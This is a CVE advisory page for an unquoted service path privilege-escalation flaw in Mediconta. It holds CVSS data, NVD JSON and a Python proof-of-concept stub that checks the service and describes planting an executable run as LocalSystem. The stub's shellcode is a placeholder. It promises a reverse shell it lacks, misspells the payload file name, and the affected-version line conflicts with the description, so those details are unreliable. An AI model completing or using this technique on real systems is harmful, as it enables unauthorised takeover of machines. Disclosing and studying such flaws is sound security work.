CVE-2023-54336

Description

Mediconta 3.7.27 contains an unquoted service path vulnerability in the servermedicontservice that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\Program Files (x86)\medicont3\ to inject malicious code that would execute with LocalSystem permissions during service startup.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Mediconta < 3.7.27

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2023-54336 PoC - Unquoted Service Path in Mediconta
# This PoC demonstrates how to exploit the unquoted service path vulnerability
# to escalate privileges on Windows systems with Mediconta installed.

import os
import subprocess
import shutil

def check_vulnerability():
    """Check if Mediconta service is installed and vulnerable"""
    try:
        # Check if the service exists
        result = subprocess.run(
            ['sc', 'qc', 'servermedicontservice'],
            capture_output=True,
            text=True
        )
        if 'BINARY_PATH_NAME' in result.stdout:
            path_line = [line for line in result.stdout.split('\n') if 'BINARY_PATH_NAME' in line]
            if path_line:
                print(f"[+] Service path: {path_line[0]}")
                return True
    except Exception as e:
        print(f"[-] Error checking service: {e}")
    return False

def create_malicious_executable():
    """Create a reverse shell payload as medictont3.exe"""
    malicious_path = r'C:\Program Files (x86)\medicont3.exe'
    
    # Create a simple executable that creates a privileged reverse shell
    # This is a simplified example - actual attack would use meterpreter or similar
    shellcode = bytes([
        0x90, 0x90, 0x90, 0x90,  # NOP sled
        # Add your actual shellcode here
    ])
    
    # In a real attack scenario, you would generate a proper executable
    # For demonstration, we show the concept:
    print(f"[*] Malicious executable would be created at: {malicious_path}")
    print("[*] When servermedicontservice starts, it will execute medictont3.exe")
    print("[*] The malicious code runs with LocalSystem privileges")

def exploit():
    """Main exploitation function"""
    print("=" * 60)
    print("CVE-2023-54336 Mediconta Unquoted Service Path Exploit")
    print("=" * 60)
    
    if check_vulnerability():
        print("[+] Mediconta service found and potentially vulnerable")
        create_malicious_executable()
        print("[+] Attack vector established")
        print("[*] Wait for service restart or trigger manually: sc stop servermedicontservice && sc start servermedicontservice")
    else:
        print("[-] Service not found or not vulnerable")

if __name__ == '__main__':
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-54336
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-54336
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-54336/
[4] VulDB https://vuldb.com/cve/CVE-2023-54336
[5] https://www.exploit-db.com/exploits/51064
[6] https://www.infonetsoftware.com
[7] https://www.vulncheck.com/advisories/mediconta-servermedicontservice-unquoted-service-path

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-54336", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:16:01.230", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mediconta 3.7.27 contains an unquoted service path vulnerability in the servermedicontservice that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\\Program Files (x86)\\medicont3\\ to inject malicious code that would execute with LocalSystem permissions during service startup."}, {"lang": "es", "value": "Mediconta 3.7.27 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio servermedicontservice que permite a usuarios locales ejecutar código potencialmente con privilegios elevados. Los atacantes pueden explotar la ruta sin comillas en C:\\Program Files (x86)\\medicont3\\ para inyectar código malicioso que se ejecutaría con permisos de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51064", "source": "[email protected]"}, {"url": "https://www.infonetsoftware.com", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/mediconta-servermedicontservice-unquoted-service-path", "source": "[email protected]"}]}}